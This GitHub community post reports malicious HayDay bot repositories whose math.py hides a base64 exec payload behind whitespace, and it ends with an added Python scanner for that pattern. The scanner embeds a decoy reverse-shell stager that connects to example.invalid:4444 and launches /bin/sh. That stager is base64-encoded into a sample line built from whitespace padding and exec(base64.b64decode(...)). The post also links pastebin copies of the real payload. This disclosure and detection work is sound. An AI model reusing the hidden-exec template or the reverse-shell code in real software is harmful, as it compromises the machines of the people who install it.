Github Rendering Vulnerability Used by Hackers #151605
Replies: 1 comment
💬 Your Product Feedback Has Been Submitted 🎉 Thank you for taking the time to share your insights with us! Your feedback is invaluable as we build a better GitHub experience for all our users. Here's what you can expect moving forward ⏩
Where to look to see what's shipping 👀
What you can do in the meantime 💻
As a member of the GitHub community, your participation is essential. While we can't promise that every suggestion will be implemented, we want to emphasize that your feedback is instrumental in guiding our decisions and priorities. Thank you once again for your contribution to making GitHub even better! We're grateful for your ongoing support and collaboration in shaping the future of our platform. ⭐
Topic area: Bug
I have found many packages using some weird stuff to hide code in plain sight.
https://github.com/ngat02/hayday-farming/blob/main/math.py
Taken down!! Nice :)
https://github.com/corvin-rose/hayday-farm-bot/blob/master/math.py
Problem is there are tens of them... This one's profile even links to a private website.
Thanks to Eric Parker https://www.youtube.com/watch?v=qgR88PEYXYE&t=70s
We now do know what it does behind the scenes!
The other side is figuring out the techniques used on the "front", github.
There are tens of similar packages for many game automations that look like viruses.
Is it because of markdown and hydration abuse?
Also, the use of math.py might be the reason?
Anyways. This would install requests, cryptography and fernet, not ideal for an OpenCV bot.
When you actually paste the code into an IDE you find a `';'importbase64';'exec` with a long string, and that's never good.
If you're feeling crazy, this is the b64 payload: https://pastebin.com/M8cps9iB
What is weird is that github seems to not be rendering this but delivering it regardless?
Also not a single virus scanner flags this?
What's weird is that even if you do check the GitHub carefully (I was just wondering why name a file "math") it looks normal. 99% sure this helps hide it from many safety checks.
I didn't go further into the reverse. Found many other duplicates of this for HayDay but also many other "patience" games labeled as working bots.
Worst part is they might even kind of work: while you're reverse-shelled you can have some wheat, maybe, perhaps. Also aimed at a younger audience, more prone to not realizing what is going on.
I did end up making one just for the fuck of it and hopefully to save some computer resets or worse.
https://github.com/h8d13/HayDay/blob/main/README.md
But ultimately there might be an issue with how the markdown is abused to look normal, and it could be replicated in any repo.
Sidenote: Also they are botting stars/forks for more downloads.
After a little more digging....
https://pastebin.com/6d8TPAZa
This shows us the full technique used to hide the code.
Firefox even already gives off several warnings about the page yet none on the page.
About 300 low-level errors and 1 high:
It also uses a:
<href>https://github.com/codespaces/new/ngat02/hayday-farming/tree/main?resume=1
I'm guessing these are hotkeys to hide the code using a trigger event that is never triggered?
The hidden tags and React nodes seem like they could easily be flagged?
This makes me think of 2010 SEO hacks where you'd put h2s everywhere hidden in a white banner xD
Real question now is how many packages have this in them... There is at least 3 clones of this one and some with screenshots. One of them with 26 stars and 10 "forks".
As you can see with the readme files of these projects, it's clearly botted contribs due to pattern being always hidden in math or any predefined system package, and with a whole project that looks legit before diving in.
My ultimate question is how this is exploited when run in an elevated env, because we already know it pings back somewhere due to the requests library; the other question is what it does on the host.
I hope there is something GitHub devs are able to do about this, as this could affect any GitHub user that uses contributed packages, and due to the fact that however thorough you are, you just can't see it. :)
Last question is, if they have been doing this for months and getting access to people's computers, what else does that open as an attack vector in JS hydration? I unfortunately lack the skills to reverse it further.
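The post describes a math.py whose ordinary-looking code is followed by a `;import base64;exec(...)` string that only shows up once the file is pasted into an editor. Below is a small source scanner that catches that shape without executing anything. It is an added example written for this page, not code from the post, from Eric Parker, or from any of the linked repositories, and it does not explain why the GitHub view hides the tail of the line. The sample file, the decoy "payload", the rule names and the thresholds (200-character lines, 40 consecutive blanks) are all constructed assumptions for the demonstration.

```python
"""Scan Python sources for code hidden off-screen behind padding or inside
base64 literals, the pattern described for the math.py files in the post.

Added example, not code from the post or the linked repositories. Nothing here
is ever executed; suspicious literals are only decoded and inspected.
"""
import base64
import re

# Assumed thresholds: wider than any normal editor view, and a run of blanks
# long enough to push the rest of a line out of sight.
MAX_LINE_LEN = 200
MIN_PADDING_RUN = 40

# Characters that render as nothing or reorder text (zero-width, BOM, bidi).
INVISIBLE = re.compile("[\u200b-\u200f\u202a-\u202e\u2060-\u2064\u2066-\u2069\ufeff]")
# Code, then a long run of blanks, then more code on the same line.
PADDING = re.compile(r"\S[ \t]{%d,}\S" % MIN_PADDING_RUN)
DYNAMIC_EXEC = re.compile(r"\b(exec|eval)\s*\(")
DECODER = re.compile(r"\b(b64decode|b32decode|a85decode|fromhex|decompress|unhexlify)\b")
B64_LITERAL = re.compile(r"['\"]([A-Za-z0-9+/=]{40,})['\"]")
# Tokens that should never appear inside a "math" helper's string constants.
PAYLOAD_KEYWORDS = ("import", "socket", "subprocess", "os.system", "urlopen",
                    "requests", "Fernet", "exec(", "connect(")


def decode_candidate(blob):
    """Best-effort base64 decode of a string literal; returns text or None."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None


def scan_python_source(text):
    """Return a list of (line_no, rule, detail) findings for one source file."""
    findings = []
    for no, line in enumerate(text.splitlines(), start=1):
        if len(line) > MAX_LINE_LEN:
            findings.append((no, "long-line", "%d chars" % len(line)))
        pad = PADDING.search(line)
        if pad:
            findings.append((no, "padding", "%d blanks before more code" % (len(pad.group(0)) - 2)))
        hidden = INVISIBLE.findall(line)
        if hidden:
            findings.append((no, "invisible-char", ", ".join("U+%04X" % ord(c) for c in hidden)))
        if DYNAMIC_EXEC.search(line) and DECODER.search(line):
            findings.append((no, "decode-and-exec", DYNAMIC_EXEC.search(line).group(1)))
        for literal in B64_LITERAL.findall(line):
            decoded = decode_candidate(literal)
            if decoded is None:
                continue
            hits = [k for k in PAYLOAD_KEYWORDS if k in decoded]
            if hits:
                findings.append((no, "encoded-payload", ", ".join(hits)))
    return findings


def triggered_rules(text):
    """Sorted list of distinct rule names that fired on a source text."""
    return sorted({rule for _, rule, _ in scan_python_source(text)})


# Constructed decoy: the shape of a reverse-shell stager, pointing at a
# reserved .invalid name so it could never connect even if someone ran it.
_DECOY_STAGER = ("import socket, subprocess\n"
                 "s = socket.socket()\n"
                 "s.connect(('example.invalid', 4444))\n"
                 "subprocess.call(['/bin/sh', '-i'])\n")
_DECOY_B64 = base64.b64encode(_DECOY_STAGER.encode()).decode()

# Constructed sample "math.py": plain helpers, then one module-level line whose
# tail is pushed 300 blanks to the right before the decode-and-exec.
SAMPLE_MATH_PY = (
    "def add(a, b):\n"
    "    return a + b\n"
    "\n"
    "def clamp(x, lo, hi):\n"
    "    return max(lo, min(x, hi))\n"
    "\n"
    "PI = 3.14159" + " " * 300 +
    ";import base64;exec(base64.b64decode('" + _DECOY_B64 + "'))\n"
)
CLEAN_SAMPLE = "def add(a, b):\n    return a + b\n"
BIDI_SAMPLE = "x = 'abc\u202e'  # comment\n"

if __name__ == "__main__":
    for no, rule, detail in scan_python_source(SAMPLE_MATH_PY):
        print("line %d  %-16s %s" % (no, rule, detail))
```

Pointed at a checkout (loop over `*.py` and call `scan_python_source` on each file's text), the "padding" and "decode-and-exec" rules alone are enough to flag the math.py shape the post describes; the base64 decode step is what turns "there is a blob" into "the blob imports socket and subprocess", which is the question the post leaves open.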